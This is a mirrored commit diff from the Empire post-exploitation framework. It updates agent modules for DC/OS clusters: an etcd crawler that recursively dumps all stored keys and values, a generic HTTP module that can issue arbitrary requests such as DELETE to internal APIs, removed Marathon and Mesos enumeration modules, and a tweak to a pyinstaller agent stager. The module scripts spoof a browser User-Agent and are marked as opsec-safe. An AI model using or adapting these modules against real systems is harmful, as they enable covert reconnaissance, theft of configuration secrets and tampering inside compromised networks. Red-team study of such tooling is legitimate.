infosecn1nja
/
Empire
mirror of https://github.com/infosecn1nja/Empire.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #403 from TweekFawkes/2.0_beta 

updated dcos modules and fixed pyinstaller for 2.0 beta
mdns
rvrsh3ll 2016-11-25 10:49:44 -05:00 committed by GitHub
parent e1dc756894 d2179b7042
commit cba0c2bf44
5 changed files with 107 additions and 248 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

78
lib/modules/python/situational_awareness/network/dcos/chronos_api_list_jobs.py → lib/modules/python/situational_awareness/network/dcos/etcd_crawler.py
View File

@ -7,26 +7,26 @@ class Module:
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Chronos API List Jobs',
'Name': 'Etcd Crawler',
# list of one or more authors for the module
'Author': ['@TweekFawkes'],
'Author': ["@scottjpack",'@TweekFawkes'],
# more verbose multi-line description of the module
'Description': ('List Chronos jobs using the HTTP API service for the Chronos Framework'),
'Description': ('Pull keys and values from an etcd configuration store'),
# True if the module needs to run in the background
'Background' : False,
'Background' : True,
# File extension to save the file as
'OutputExtension': "json",
'OutputExtension': "",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# the module language
'Language' : 'python',
@ -34,7 +34,7 @@ class Module:
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': ["Docs: https://mesosphere.github.io/mesos-dns/docs/http.html", "Source Code: https://github.com/mesosphere/mesos-dns/blob/master/resolver/resolver.go"]
'Comments': ["Docs: https://coreos.com/etcd/docs/latest/api.html"]
}
# any options needed by the module, settable during runtime
@ -51,13 +51,19 @@ class Module:
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'FQDN, domain name, or hostname to lookup on the remote target.',
'Required' : True,
'Value' : 'chronos.mesos'
'Value' : 'etcd.mesos'
},
'Port' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'The port to connect to.',
'Description' : 'The etcd client communication port, typically 2379 or 1026.',
'Required' : True,
'Value' : '8080'
'Value' : '1026'
},
'Depth' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'How far into the ETCD hierarchy to recurse. 0 for root keys only, "-1" for no limitation',
'Required' : True,
'Value' : '-1'
}
}
@ -71,6 +77,7 @@ class Module:
# in case options are passed on the command line
if params:
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
@ -78,28 +85,51 @@ class Module:
def generate(self):
target = self.options['Target']['Value']
port = self.options['Port']['Value']
#port = self.options['Port']['Value']
#print str("port: " + port)
#depth = self.options['Depth']['Value']
#print str("depth: " + port)
#if not type(depth) == type(1):
# depth = int(depth)
#if not type(port) == type(1):
# port = int(port)
port = self.options['Port']['Value']
depth = self.options['Depth']['Value']
#print str("target: " + target)
#print str("port: " + port)
#print str("depth: " + depth)
script = """
import urllib2
import json
target = "%s"
port = "%s"
depth = "%s"
url = "http://" + target + ":" + port + "/scheduler/jobs"
def get_etcd_keys(target, port, path, depth):
keys = {}
resp = urllib2.urlopen("http://" + target + ":" + port + "/v2/keys" + path)
r = resp.read()
r = json.loads(r)
for n in r['node']['nodes']:
if "dir" in n.keys() and (depth>0):
keys.update(get_etcd_keys(target, port, n['key'], depth-1))
elif "dir" in n.keys() and (depth == -1):
keys.update(get_etcd_keys(target, port, n['key'], depth))
elif "value" in n.keys():
keys[n['key']] = n['value']
else:
keys[n['key']] = "directory"
return keys
try:
request = urllib2.Request(url)
request.add_header('User-Agent',
'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) '
'Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0')
opener = urllib2.build_opener(urllib2.HTTPHandler)
content = opener.open(request).read()
print str(content)
except Exception as e:
print "Failure sending payload: " + str(e)
def main():
k = get_etcd_keys(target, port, "/", depth)
print str(k)
""" %(target, port)
main()
""" % (target, port, depth)
return script

106
lib/modules/python/situational_awareness/network/dcos/marathon_api_list_apps.py
View File

@ -1,106 +0,0 @@
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Marathon API List Apps',
# list of one or more authors for the module
'Author': ['@scottjpack','@TweekFawkes'],
# more verbose multi-line description of the module
'Description': ('List Marathon Apps using Marathon\'s REST API'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension': "json",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': ["Marathon REST API documentation version 2.0: https://mesosphere.github.io/marathon/docs/generated/api.html", "Marathon REST API: https://mesosphere.github.io/marathon/docs/rest-api.html", "Marathon REST API: https://open.mesosphere.com/advanced-course/marathon-rest-api/"]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Target' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'FQDN, domain name, or hostname to lookup on the remote target.',
'Required' : True,
'Value' : 'marathon.mesos'
},
'Port' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'The port to connect to.',
'Required' : True,
'Value' : '8080'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
target = self.options['Target']['Value']
port = self.options['Port']['Value']
script = """
import urllib2
target = "%s"
port = "%s"
url = "http://" + target + ":" + port + "/v2/apps"
try:
request = urllib2.Request(url)
request.add_header('User-Agent',
'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) '
'Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0')
request.add_header('Content-Type', 'application/json')
opener = urllib2.build_opener(urllib2.HTTPHandler)
content = opener.open(request).read()
print str(content)
except Exception as e:
print "Failure sending payload: " + str(e)
print "Finished"
""" %(target, port)
return script

105
lib/modules/python/situational_awareness/network/dcos/mesos_master_api_list_slaves.py
View File

@ -1,105 +0,0 @@
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Mesos Master API List Slaves',
# list of one or more authors for the module
'Author': ['@scottjpack', '@TweekFawkes'],
# more verbose multi-line description of the module
'Description': ('List Mesos Agents/Slaves using the HTTP API for the Mesos Master service'),
# True if the module needs to run in the background
'Background' : False,
# File extension to save the file as
'OutputExtension': "json",
# if the module needs administrative privileges
'NeedsAdmin' : False,
# True if the method doesn't touch disk/is reasonably opsec safe
'OpsecSafe' : True,
# the module language
'Language' : 'python',
# the minimum language version needed
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': ["Docs: https://mesosphere.github.io/mesos-dns/docs/http.html", "Source Code: https://github.com/mesosphere/mesos-dns/blob/master/resolver/resolver.go"]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Agent to execute module on.',
'Required' : True,
'Value' : ''
},
'Target' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'FQDN, domain name, or hostname to lookup on the remote target.',
'Required' : True,
'Value' : 'master.mesos'
},
'Port' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'The port to connect to.',
'Required' : True,
'Value' : '5050'
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
# During instantiation, any settable option parameters
# are passed as an object set to the module and the
# options dictionary is automatically set. This is mostly
# in case options are passed on the command line
if params:
for param in params:
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self):
target = self.options['Target']['Value']
port = self.options['Port']['Value']
script = """
import urllib2
target = "%s"
port = "%s"
url = "http://" + target + ":" + port + "/slaves"
try:
request = urllib2.Request(url)
request.add_header('User-Agent',
'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) '
'Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0')
opener = urllib2.build_opener(urllib2.HTTPHandler)
content = opener.open(request).read()
print str(content)
except Exception as e:
print "Failure sending payload: " + str(e)
""" %(target, port)
return script

62
lib/modules/python/situational_awareness/network/dcos/mesos_dns_api_enumerate.py → lib/modules/python/situational_awareness/network/http_rest_api.py
View File

@ -7,19 +7,19 @@ class Module:
# metadata info about the module, not modified during runtime
self.info = {
# name for the module that will appear in module menus
'Name': 'Mesos DNS API Enumeration',
'Name': 'HTTP REST API',
# list of one or more authors for the module
'Author': ['@TweekFawkes'],
'Author': ['@TweekFawkes',"@scottjpack"],
# more verbose multi-line description of the module
'Description': ('Enumerate Mesos DNS information using the HTTP API for the Mesos DNS service'),
'Description': ('Interacts with a HTTP REST API and returns the results back to the screen.'),
# True if the module needs to run in the background
'Background' : False,
'Background' : True,
# File extension to save the file as
'OutputExtension': "json",
'OutputExtension': "",
# if the module needs administrative privileges
'NeedsAdmin' : False,
@ -34,7 +34,7 @@ class Module:
'MinLanguageVersion' : '2.6',
# list of any references/other comments
'Comments': ["Docs: https://mesosphere.github.io/mesos-dns/docs/http.html", "Source Code: https://github.com/mesosphere/mesos-dns/blob/master/resolver/resolver.go"]
'Comments': ["Docs: https://mesos.github.io/chronos/docs/api.html", "urllib2 DELETE method credits to: http://stackoverflow.com/questions/21243834/doing-put-using-python-urllib2"]
}
# any options needed by the module, settable during runtime
@ -47,17 +47,35 @@ class Module:
'Required' : True,
'Value' : ''
},
'Protocol' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'Protocol or Scheme to use.',
'Required' : True,
'Value' : 'http'
},
'Target' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'FQDN, domain name, or hostname to lookup on the remote target.',
'Description' : 'FQDN, domain name, or hostname of the remote target.',
'Required' : True,
'Value' : 'master.mesos'
},
'Port' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'The port to scan for.',
'Description' : 'The port to connect to.',
'Required' : True,
'Value' : '8123'
},
'Path' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'The path.',
'Required' : True,
'Value' : '/v1/version'
},
'RequMethod' : {
# The 'Agent' option is the only one that MUST be in a module
'Description' : 'The HTTP request method to use.',
'Required' : True,
'Value' : 'GET'
}
}
@ -78,20 +96,39 @@ class Module:
def generate(self):
protocol = self.options['Protocol']['Value']
target = self.options['Target']['Value']
port = self.options['Port']['Value']
path = self.options['Path']['Value']
requmethod = self.options['RequMethod']['Value']
script = """
import urllib2
protocol = "%s"
target = "%s"
port = "%s"
path = "%s"
requmethod = "%s"
url = "http://" + target + ":" + port + "/v1/enumerate"
url = protocol + "://" + target + ":" + port + path
class MethodRequest(urllib2.Request):
def __init__(self, *args, **kwargs):
if 'method' in kwargs:
self._method = kwargs['method']
del kwargs['method']
else:
self._method = None
return urllib2.Request.__init__(self, *args, **kwargs)
def get_method(self, *args, **kwargs):
if self._method is not None:
return self._method
return urllib2.Request.get_method(self, *args, **kwargs)
try:
request = urllib2.Request(url)
request = MethodRequest(url, method=requmethod)
request.add_header('User-Agent',
'Mozilla/6.0 (X11; Linux x86_64; rv:24.0) '
'Gecko/20140205 Firefox/27.0 Iceweasel/25.3.0')
@ -101,6 +138,7 @@ try:
except Exception as e:
print "Failure sending payload: " + str(e)
""" %(target, port)
print "Finished"
""" %(protocol, target, port, path, requmethod)
return script

4
lib/stagers/osx/pyinstaller.py → lib/stagers/multi/pyinstaller.py
View File

@ -117,7 +117,7 @@ class Stager:
cur.close()
import os
stagerFFP_Str = os.path.join(installPath_Str, "data/agent/stager.py")
stagerFFP_Str = os.path.join(installPath_Str, "data/agent/stagers/http.py")
filesToExtractImportsFrom_List.append(stagerFFP_Str)
agentFFP_Str = os.path.join(installPath_Str, "data/agent/agent.py")
@ -135,6 +135,8 @@ class Stager:
helpers.color(line)
imports_List.append(line)
imports_List.append('import trace')
imports_List.append('import json')
imports_List = list(set(imports_List)) # removing duplicate strings
imports_Str = "\n".join(imports_List)
launcher = imports_Str + "\n" + launcher